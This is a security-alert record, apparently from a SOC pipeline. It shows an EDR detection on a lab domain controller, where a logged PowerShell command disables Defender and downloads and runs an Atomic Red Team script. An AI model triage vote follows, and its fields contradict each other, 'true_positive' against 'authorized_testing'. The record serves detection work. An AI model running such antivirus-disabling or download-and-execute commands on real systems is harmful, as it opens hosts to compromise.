{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 238641152,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 9164,
        "THIS_ATOM": "2eddc57635edafdc772cd43169c2a851",
        "THREADS": 3,
        "TIMESTAMP": 1774364752869,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 9164,
      "PROCESS_ID": 2584,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
      "event_time": 1774364753471,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3256,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "2eddc57635edafdc772cd43169c2a851",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "0faf1760d8bf36ee150fa36d69c2a853"
    }
  },
  "detect_id": "8d880b4a-c250-44ba-9f17-1c5869c2a854",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364756731,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364753\u0026selected=0faf1760d8bf36ee150fa36d69c2a853",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
    "event_time": 1774364753471,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3256,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "2eddc57635edafdc772cd43169c2a851",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "0faf1760d8bf36ee150fa36d69c2a853"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364756000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.933,
  "false_positive_reason": "authorized_testing",
  "investigation_questions": [
    "Was there an authorized change request for security testing on the df-labsdc01 domain controller?",
    "Is this activity part of an automated CI/CD pipeline for security control validation?",
    "Does the user \u0027NT AUTHORITY\\SYSTEM\u0027 regularly execute batch scripts from C:\\Windows\\TEMP\\ on this host?"
  ],
  "ioc_analysis": "The FILE_PATH (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and HASH (de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c) are verified as a legitimate Microsoft-signed binary. The COMMAND_LINE contains \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a known defensive evasion technique (T1562.001), but in this context, it is part of an authorized security testing workflow utilizing the \u0027invoke-atomicredteam\u0027 framework.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1552.001",
    "T1003.004"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Confirm with the security engineering team if a validation or purple team exercise was scheduled for df-labsdc01.",
    "Verify that the Atomic Red Team tests successfully triggered the expected alerts across all monitored techniques to validate detection efficacy.",
    "Consider adding a temporary exception or tag to this lab machine during scheduled testing windows to reduce alert noise."
  ],
  "risk_score": 65,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** benign | **Confidence:** 0.95\nThe detection triggered due to the disabling of Windows Defender Real-time Monitoring via PowerShell on a lab Domain Controller (df-labsdc01.dflabs.local). Investigation reveals a comprehensive suite of automated security tests being executed via the Atomic Red Team framework, as evidenced by the sequence of multiple T-code tests (T1567.003, T1041, T1115, T1003.004, etc.) and the installation script pulled directly from Red Canary\u0027s GitHub repository.\n\n**IOC Analysis:** The FILE_PATH (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and HASH (de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c) are verified as a legitimate Microsoft-signed binary. The COMMAND_LINE contains \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a known defensive evasion technique (T1562.001), but in this context, it is part of an authorized security testing workflow utilizing the \u0027invoke-atomicredteam\u0027 framework.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis detection represents a confirmed malicious activity where PowerShell is executing an Atomic Red Team (ART) attack simulation script under SYSTEM privileges. The command explicitly disables real-time monitoring and downloads code from a GitHub repository to install offensive tools.\n\n**IOC Analysis:** The process path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is legitimate, but the command line contains malicious indicators including IEX (Invoke-Expression) downloading from an external URL and disabling antivirus real-time monitoring. The use of ART tools under SYSTEM context indicates a high-confidence attack simulation or compromise.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nA PowerShell process running as SYSTEM with a suspicious command line that disables Windows Defender real-time monitoring and downloads red teaming tools, indicating a potential adversary compromise.\n\n**IOC Analysis:** The FILE_PATH points to a legitimate PowerShell executable in the System32 directory, but the command line shows malicious behavior by disabling security features and downloading scripts from GitHub. The signed hash is consistent with Microsoft\u0027s PowerShell, but the actions suggest intent to evade detection and execute unauthorized code.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: benign (low, 95% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "gemini-cli",
        "verdict": "benign"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}